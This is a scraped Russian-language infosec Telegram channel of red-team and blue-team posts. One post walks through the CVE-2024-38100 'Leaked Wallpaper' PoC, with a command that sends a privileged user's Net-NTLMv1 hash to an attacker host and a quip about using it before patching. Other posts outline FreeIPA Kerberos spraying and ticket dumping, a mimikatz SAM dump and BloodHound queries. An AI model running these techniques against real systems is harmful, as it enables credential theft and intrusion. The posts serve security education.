REDtalk
1.07K subscribers
83 photos
1 video
11 files
98 links
Здесь вы найдете всё из мира ИБ. Говорим простыми словами о сложном. С нами кибербезопасность – ваш компаньон в цифровом мире. Вместе к безопасному будущему! 🌐🔐

По вопросам сотрудничества: @closed_character
Download Telegram
A long time ago... около двух недель назад был опубликован POC для CVE-2024-38100 под названием Leaked Wallpaper. Сегодня посмотрим на него поближе😋

😦Что за CVE?

CVE-2024-38100 — уязвимость в механизме обработки обоев операционной системы Windows.

😳Принцип работы эксплоита

Реализован через изменение обоев привилегированного пользователя с использованием специального COM-oбъекта


😋По шагам:
1. Билдим наш exe
2. Чекаем сессии через quser
3. Выбираем жертву среди сессий
4. Пускаем на нее наш эксплоит :
LeakedWallpaper.exe session_id \\attacker_ip\c$\1.jpg -downgrade

‼️ Стоит обратить внимание на флаг -downgrade (понижение версии NetNTLM), для его использования необходимы права локального администратора, а именно наличие прав на изменение параметров реестра LMCompatibilityLevel, NtlmMinClientSec, RestrictSendingNTLMTraffic.

5. Вы великолепны, получили Net-NTLMv1 (см. пикчу в посте). В результате можно релеить, брутить или восстановить NTLM-хеш при помощи брута и уязвимостей DES.

😳Что по детектам?
Ни в статике, ни в динамике антивирь пока не ругается

🙂Уже пофиксили?
Да, в июне Microsoft выпустили фиксу KB5040434, так что успевайте юзать до ее установки :)

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍4🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Привет, а мы сегодня на Offzone.

Доклады неплохие, и конкурсы интересные. Не хватает только бесплатной еды (бесплатная вода есть)
🔥11😁3
Так уж получилось, что мы попали под недавнюю багу в обновлении windows. Мы, настроенные порешать таски на второй день, решили взять ноут, но вот обновлять винду было ошибкой. Grub перестал загружаться, и выяснялось это как раз в тот момент, когда сели решать таски. 😥

Ну а в общем по офзону всё как всегда - куча активностей, докладов и мерча. И не менее важная фишка - постоянные очереди на стендах. Но проводить время всё равно приятно и интересно.
😱42😭2🌚1
Привет, друзья! 👋

Хочу поделиться интересной статьей от коллег из Kaspersky о самых популярных эксплойтах и уязвимостях за второй квартал 2024 года.

За первый квартал этого года наиболее популярными уязвимостями были различные инъекции:

1️⃣SQL Injection

2️⃣Command Injection

Во втором квартале лидеры изменились:

1️⃣Unrestricted Upload of File with Dangerous Type

2️⃣SQL Injection

3️⃣Path Traversal

Из наиболее часто эксплуатируемых CVE для Windows:

1️⃣RCE:
CVE-2018-0802, CVE-2017-11882 - уязвимости в редакторе формул ms office

CVE-2021-40444 - уязвимость в MSHTML

2️⃣LPE: CVE-2017-0199 - уязвимость в MS office и WordPad

Для Linux:

1️⃣LPE:
CVE-2022-0847, CVE-2023-2640 — уязвимости в ядре Linux

CVE-2021-4034 — уязвимость в утилите pkexec

😏 Подробнее можно прочитать здесь: vulnerability-exploit-report-q2-2024

Главное, друзья, без паники 😊! Грамотный мониторинг сети, своевременный патч-менеджмент и комплексный подход к защите, включая обучение сотрудников основам ИБ, помогут вам сохранить спокойствие и безопасность.

Всем хорошей рабочей недели и будьте в безопасности! 🛡

#blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍2
💥 Привет. Решил я значит перейти с bloodhound на bloodhound-ce, так как первый перестал поддерживаться. Делюсь опытом:

*️⃣ Ставится одной командой запуска контейнеров. Хоть и предыдущий бладхаунд тоже был прост в развертывании, там не было единого docker-compose файла из коробки
*️⃣ Клиентский интерфейс переехал в веб, что является как плюсом (можно развернуть прям на сервере), так и минусом (спад в производительности)
*️⃣ Нет темной темы, значит интерфейс уже устарел
*️⃣ Нету дебаг-режима для запросов к Neo4j. Да, есть отдельное поле, в которое можно писать, но отображает оно не всё

Но самое главное, это пляски с пометкой цели как Owned и High Value. В прошлом бладхаунде это было просто:

MATCH (u: User) WHERE u.owned = True RETURN u


Но я удивился, когда обнаружил, что в новой версии свойства owned и highvalue отсутствуют. Ко всему прочему, в дефолтные запросы не завезли манипуляции с этими свойствами. Что делать?

Оказывается, теперь это переехало в свойство system_tags

MATCH (u: User) WHERE u.system_tags is not null RETURN u.name, u.system_tags LIMIT 2000

╒═════════════════════╤════════════════════╕
│u.name │u.system_tags │
╞═════════════════════╪════════════════════╡
│"user1@DOMAIN1.CORP" │"owned" │
├─────────────────────┼────────────────────┤
│"user2@DOMAIN2.CORP" │"admin_tier_0 owned"│
└─────────────────────┴────────────────────┘


Да, разрабы зачем-то решили хранить элементы в строке, разделенной пробелами.

Вопрос: вот мы каким-то образом скомпрометировали пачку пользаков, допустим 50 штук. Как их пометить, как “Owned” и не получить нервный тик. Я придумал вот такое кривое:

WITH ['user1@domain.corp', 'user2@domain.corp', 'user3@domain.corp'] AS userList
MATCH (u:User)
WHERE toLower(u.name) IN userList AND (u.system_tags IS NULL OR u.system_tags = '' OR NOT u.system_tags CONTAINS 'owned')
SET u.system_tags = CASE
WHEN u.system_tags IS NULL OR u.system_tags = '' THEN 'owned'
ELSE u.system_tags + ' owned'
END
RETURN u.name, u.system_tags


Как посмотреть помеченных

MATCH (n)
WHERE n.system_tags CONTAINS 'owned'
RETURN n


Но при этом немного ломается gui-интерфейс - пропадает кнопка “Add To Owned/Remove From Owned”, и вот тут я уже хз.

Это конечно, крайне неудобно, при том, что этот функционал довольно важный при просмотре мисконфигов. И в интернетах информации крайне мало. Надеюсь, у разрабов были причины менять логику работы
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍21👨‍💻1👀1
🎉 Друзья, а тем временем нас уже более 500! 🎉

Большое спасибо каждому из вас за то, что вы с нами! 💖 Ваша поддержка и активность вдохновляют нас делать контент еще лучше!

Оставайтесь с нами, впереди много интересного! 🙌

#REDtalk
❤‍🔥12👍4🎉3
This media is not supported in your browser
VIEW IN TELEGRAM
❤‍🔥7😁4🤓2🦄1
FreeIPA, would you?😉
И нет, речь не о бесплатной ипе в банке с последней конфы😋

Собственно, не так давно отгремел OFFZONE 2024, где одной из тем докладов стала FreeIPA.
Этот пост будет беглым ознакомлением о том, с чем кушац эту вашу FreeIPA.

😳Так о чем речь?

Коротко:
FreeIPA:централизованное управление идентификацией и доступом

То есть этакий аналог с открытым исходным кодом всем уже давно знакомой Active Directory, но для линухов.

😦Немножко больше инфы для общего понимания

База с freeipa.org
Ее возможности:
➡️Управлять пользователями и группами: создавать, редактировать, удалять учетные записи пользователей и групп.
➡️Управлять доступом: назначать права доступа к файлам, каталогам, системам и приложениям.
➡️Автоматизировать задачи: использовать автоматизацию для рутинных задач управления доступом.
➡️Обеспечивать безопасность: использовать аутентификацию Kerberos, SSO и другие функции для повышения безопасности.

🥰Ha-hack FreeIPA

Сразу хочется отметить одну из интересных особенностей это отсутствие NTLM-аутентификации.

Если не хочешь, чтобы релеили твой NTLM, не юзай NTLM💅


Также в FreeIPA используется полностью своя LDAP структура, но можно юзать старый добрый ldapsearch.

Что по Kerberos:
▪️User enum (kerbrute)
▪️Password spraying (kerbrute)
▪️Дамп тикетов (tickey)
▪️Получение ключа хоста (/etc/krb5.keytab)

Ну и естественно можно найти всякие интересные CVE.

😳Итог:
Мало доков, нет готовых автоматизированных решений для поиска уязвимостей, но зато открытый исходый код для тех, кто хочет узнать, что там под капотом.

👍Тот самый доклад с OFFZONE для ознакомления:
Pentest FreeIPA, или Углубляемся в зоопарк

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍3🫡2🔥1
REDtalk
💥 Привет. Решил я значит перейти с bloodhound на bloodhound-ce, так как первый перестал поддерживаться. Делюсь опытом: *️⃣ Ставится одной командой запуска контейнеров. Хоть и предыдущий бладхаунд тоже был прост в развертывании, там не было единого docker…
💥 Привет, недавно я делал пост про странную логику Bloodhound-CE при работе с Owned и High Value пользователях.
Проблема была в кривом отображении UI и сбросе данных после перезагрузки при ручной пометке через Neo4j.

Я пошел смотреть исходники и обнаружил преинтереснейшую вещь — В отличии от предыдущего бладхаунда, тут, помимо приложухи и Neo4j в стек добавилась Postgres. Если раньше аутентификация проводилось только через bolt в Neo4j, то тут добавляется еще и аутентификация в саму GUI. Вот эта инфа, и другие настройки, типа Custom Queries хранятся в постгресе.

И (уже не первый раз) я удивился, когда увидел, что там в отдельной таблице хранятся данные об Owned и High-Value нодах.
bloodhound=# select * from asset_group_selectors;
---+------------------+------------------+---+----+-------------------------------+------------------------------
1 | S-1-<SNIP>-17251 | S-1-<SNIP>-17251 | f | 1 | 2024-09-02 09:34:55.977957+00 | 2024-09-02 09:34:55.977957+00
1 | S-1-<SNIP>-7261 | S-1-<SNIP>-7261 | f | 3 | 2024-09-02 10:51:05.968531+00 | 2024-09-02 10:51:05.968531+00
1 | S-1-<SNIP>-13965 | S-1-<SNIP>-13965 | f | 4 | 2024-09-02 10:51:10.386376+00 | 2024-09-02 10:51:10.386376+00
1 | S-1-<SNIP>-21856 | S-1-<SNIP>-21856 | f | 5 | 2024-09-02 11:29:49.443476+00 | 2024-09-02 11:29:49.443476+00
(4 rows)
bloodhound=# select * from asset_groups;
name | tag | system_group | id | created_at | updated_at
-----------------+--------------+--------------+----+-------------------------------+-------------------------------
Owned | owned | t | 1 | |
Admin Tier Zero | admin_tier_0 | t | 2 | 2024-08-28 12:34:58.093203+00 | 2024-08-28 12:34:58.093203+00
(2 rows)


Из запроса можно увидеть 2 таблицы, одна из которых (нижняя) содержит теги и ID этих тегов, вторая (верхняя) совмещает SID объектов AD с этими ID. То-есть у меня в бладхаенде есть 4 пользака, помеченные как Owned.

И после перезагрузки все свойства system-tags, что было отмечено в Neo4J обнуляются и устанавливаются вот эти четыре.
Нет слов, одни эмоции, не знаю, зачем разработчики сделали такую логику. Наверное стоит завести Issue на гитхабе

#redteam
👍5🔥43👏2
SOC на аутсорсе 💰 или in-house SOC 🧃
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой, но так как я поработал и там и там расскажу о тех моментах, с которыми мне пришлось столкнуться.

Начнем с SOC-а на аутсорсе.

Плюсы:

1. Четкое разграничение ответственности
Моя первая работа в качестве SOC аналитика началась именно там, поначалу безумно нравилось тем, что при заключении договора, есть четкая документация, в рамках которой ты работаешь, в целом все понятно и прозрачно, кому что писать, у кого что спрашивать;

2. Работодатель более охотно оплачивает курсы, платные митапы
Компания заинтересована в вашем развитии, т.к. вы тот актив, который приносит деньги, и от качества предоставляемой услуги, зависит удовлетворенность заказчика и следовательно продление\подписание новых контрактов;

3. Большая команда
Как правило именно тут команда SOC будет больше, т.к. такой SOC создается под несколько компаний, а следовательно больше людей - больше компетенций.

Минусы:

1. Не вовлеченность заказчика
Как и многие мои коллеги, я столкнулся с проблемой, что услуга SOC приобреталась с целью отчета перед регулятором о том, что инфраструктуру мониторят, а если это так, то у вас целый букет проблем
Запросы о предоставлении дополнительной информации, необходимой для расследования инцидента, могут висеть неделями, рекомендации об устранении инцидента могут игнорироваться, а сбор дополнительных событий будет расцениваться как попытка саботажа и отвергнута по причине излишней нагрузки на сеть;

2. Ощущение работы в пустую
Вытекает из предыдущего минуса, и начинаешь ощущать это тогда, когда хочешь сделать что то хорошо, тратишь на решение какой то проблемы время, но от твоих идей отказываются за ненадобностью;

3. Достаточно высокая нагрузка
Как правило на мониторинге находятся несколько компаний и периодически случается так, что иногда не хватает времени на то, что бы нормально поесть.

Итог:
На мой взгляд, это отличное место для старта карьеры, как правило, в таких SOC-ах, большая часть процессов выстроена и следовательно не нужно изобретать велосипед. Сотрудников больше чем в in-house, следовательно всегда есть человек, который может что-то подсказать. Но я там не смог долго проработать по ряду причин, одна из которых это ощущение работы в пустую.

Был ли у вас опыт работы в SOC-е на аутсорсе, и с какими нюансами работы сталкивались вы?

В следующей статье, расскажу про нюансы работы в in-house SOC-е
#SOC #blueteam #REDtalk
🔥9👍22❤‍🔥1
😁75🤬1🎃1
Доброго времени суток, друзья!🎉 У нас небольшие изменения на канале! 🛠️!

Мы рады представить обновленный состав нашей команды авторов 🥰:

@closed_character - red team
@pyfffe - red team
@Huioofy - red team

Мы всегда стремимся улучшить ваш опыт, поэтому решили добавить хештеги для удобной навигации по контенту канала #️⃣:

#redteam - статьи и посты из мира ИБ со стороны нападения
#blueteam - статьи и посты из мира ИБ со стороны защиты
#REDtalk - новости и анонсы канала
#meme - мемы наше все
#ToolTricks - различные интересные лайфхаки или обзоры инструментов несвязанных с red team или blue team
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍4👨‍💻1👾1
REDtalk pinned «Доброго времени суток, друзья!🎉 У нас небольшие изменения на канале! 🛠️! Мы рады представить обновленный состав нашей команды авторов 🥰: @closed_character - red team @pyfffe - red team @Huioofy - red team Мы всегда стремимся улучшить ваш опыт, поэтому…»
🔥 Привет! Когда-нибудь настанет момент, когда появится задача по брутфорсу чего-либо на срок, сильно превышающий несколько часов, и было бы круто автоматизировать запуск, мониторинг и конечный просмотр атаки.

Можно ли сделать телеграм-бота без использования специализированных фреймворков и навыков программирования?

Конечно можно. 🔗 Вот пример прямого обращения к API, используя curl

Тут присутствует задержка между спреями для избежания блокировки, и время сна, на случай, если что-то положится, то хотя бы не ночью. И конечно же подключён бот, буквально двумя строками кода

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
542
Привет, друзья! 👋

А мы тут залетели на GISDays! 🥰

Хороший тамада и конкурсы интересные 😊

#REDtalk
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
114👌22😁1
Forwarded from ℭ𝔲𝔩𝔱
Мы сгоняли в Питер, весело провели время, нарешали стеги и набрутили учеток на 80к! 🎈🎈🎈

Никогда плотность рофлов на квадратный сантиметр так не зашкаливала! 🤣🤣🤣

Спасибо всем, кто поддерживал и болел!
❤‍🔥12🙏321
Привет, друзья! 👋

Принёс вам историю из реальных кейсов по пентесту — всё как вы любите: взломы, стрельба, горящие админы. 🔥 Готовьте попкорн, потому что будет жарко! 😎

Всем приятного чтения, а я дальше пойду добивать свой отпуск! 🏖️

Ссылочка на статью: https://shankdy.notion.site/112cfaa22e1e8017a274c546dee209d5

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
132221
🎆 Привет!

Нежданно-негаданно приехала новая часть постов про антивирусы.
Это третья часть из серии постов про мой опыт изучения работы антивирусных средств и EDR. В ней была проведена работа над ошибками предыдущих частей и далее рассказано и показано про работу meterpreter и msfvenom.

Ссылка: 🔗 Тык

Основная её цель - показать, что у метерпретера, и метасплоита существует 👀 исходный код и официальная документация , на что стоит обращать внимание при изучении их работы.

Приятного чтения!

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
6331
« Всё это было только ради поста ( @pyfffe ) »

💥 Привет! А я тут 🔗 налутал HTB CPTS и спешу поделиться мыслями и лайфхаками по этому сертификату. Для начала несколько вступительных слов.

Что там за задание?
Дан лабораторный стенд с эмуляцией инфраструктуры небольшой компании, с линуксами и виндовсоми. Цель — взломать и написать отчёт по проведению пентеста. Присутствует возможность полной перезагрузки стенда.

Какие ограничения?
Дедлайн — 10 дней включительно (также входит одна попытка на пересдачу). В инструментах не ограничивают. Прокторинга нет. Шаблон для отчета дадут.

Теперь лайфхаки:

*️⃣ Во первых очень важно спланировать свое время. Может показаться, что 10 дней — это много, но в моём случае потребовалось тратить по 8-10 часов в день. Если же у вас нет столько свободного времени, можно использовать еще 10 дней из попытки пересдачи. Также выделите несколько дней на оформление отчета.

*️⃣ Перед началом сдачи подготовьте рабочее пространство. Убедитесь, что у вас работает то, о чем говорить нельзя, и сетевой VPN трафик до стенда не блокируется. Если его всё-таки блокируют, то есть два выхода:
1️⃣Первый - использовать предоставленный для сдачи экзамена Pwnbox (выделенную виртуальную машину с ParrotOS), но у него два основных минуса - это подключение по VNC через браузер, без возможности ctrl+c ctrl+v, и ограниченное время работы, из-за чего приходится перезапускать виртуалку. В общем, это не мой путь 💀
2️⃣Второй выход - это арендовать VPS, с которого будет работать OpenVPN к лабе, и работать через него. Больше гемора с настройкой, но удобнее и реалистичнее

*️⃣ Вы единственный пользователь стенда, а значит ничего не мешяет добавить туда такие вектора атак, которые неприменимы для обычных HTB-Коробок.

*️⃣ В отчете нужно будет показать все шаги компрометации так, чтобы это смогла повторить бабушка админа, поэтому логируйте каждый шаг взлома, Включая, к примеру, mimicatz.exe lsadump::sam и sharphound.exe -c All.

*️⃣ Лаба несложная, zero-day нет, Вся информация есть либо на HTB Academy, либо в гугле. Однако, тут много кроличьих нор, из-за чего необходимо досконально проверять каждый предположительный вектор атаки.

Ну вот вроде всё. У меня сдача заняла 9 дней, отчет проверяли 5 рабочих дней. Результатом доволен 👾

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
15❤‍🔥22